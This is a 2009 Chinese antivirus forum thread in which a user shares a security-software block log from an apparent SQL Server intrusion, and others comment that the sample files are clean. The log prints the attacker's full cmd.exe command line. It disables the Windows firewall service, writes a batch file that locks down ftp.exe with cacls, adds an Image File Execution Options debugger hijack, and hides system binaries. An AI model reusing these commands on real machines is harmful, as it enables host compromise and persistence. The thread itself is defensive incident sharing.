查看: 3932|回复: 5
收起左侧

[病毒样本] 貌似利用sqlserver漏洞攻击,ftp.exe,cacls.exe等样本

[复制链接]
daishaodong
发表于 2009-7-6 13:15:49 | 显示全部楼层 |阅读模式
eq盾的拦截日志:脏话都出来了,很是猖狂:
2009-07-04 21:21:01    应用程序保护(运行应用程序)     操作:阻止
进程路径:d:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe
文件路径:C:\WINDOWS\System32\cmd.exe
命令行:/c sc delete sharedaccess&echo 干你娘,还脱壳,能看到这句不?>>2.txt&echo cacls.exe C:\WINDOWS\\system32\\ftp.exe /e /d everyone>C:\WINDOWS\\system32\\spool\\NetSetup2.bat&echo reg add  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\ftp.exe"  /v Debugger /t REG_SZ /d ctfmon.exe /f>>C:\WINDOWS\system32\spool\NetSetup2.bat&echo attrib +s +r +h C:\WINDOWS\\system32\\cmd.exe>>C:\WINDOWS\\system32\\spool\\NetSetup2.bat&echo attrib +s +r +h C:\WINDOWS\\system32\\ftp.exe>>C:\WINDOWS\\system32\\spool\\NetSetup2.bat&echo attrib +s +r +h C:\WINDOWS\\system32\\reg.exe>>C:\WINDOWS\\system32\\spool\\NetSetup2.bat&echo del %0>>C:\WINDOWS\system32\spool\NetSetup2.bat&echo reg delete" + "  \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\currentversion\\image file execution options\\ftp.exe\"" + "  /f>>C:\WINDOWS\\system32\\export\\nvuninm.bat&C:\WINDOWS\system32\spool\NetSetup2.bat


网上有如此资料:
可参考http://www.cnitblog.com/William/archive/2007/10/19/35081.html

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
daishaodong
 楼主| 发表于 2009-7-6 13:16:47 | 显示全部楼层
补充下,那几个文件,虽然在线扫描没什么问题,但都不能通过数字签名验证,而且md5值与正常的不一样,正常的文件是能通过数字签名验证的。。
mofunzone
发表于 2009-7-6 15:54:29 | 显示全部楼层
to avira
angir
发表于 2009-7-6 16:10:59 | 显示全部楼层
To MP
IllusionWing
发表于 2009-7-6 16:12:25 | 显示全部楼层
文件无问题。不过攻击倒是货真价实的。。
BING126
头像被屏蔽
发表于 2009-7-6 22:40:02 | 显示全部楼层
三个东西很正常。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-11-17 11:02 , Processed in 0.130032 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表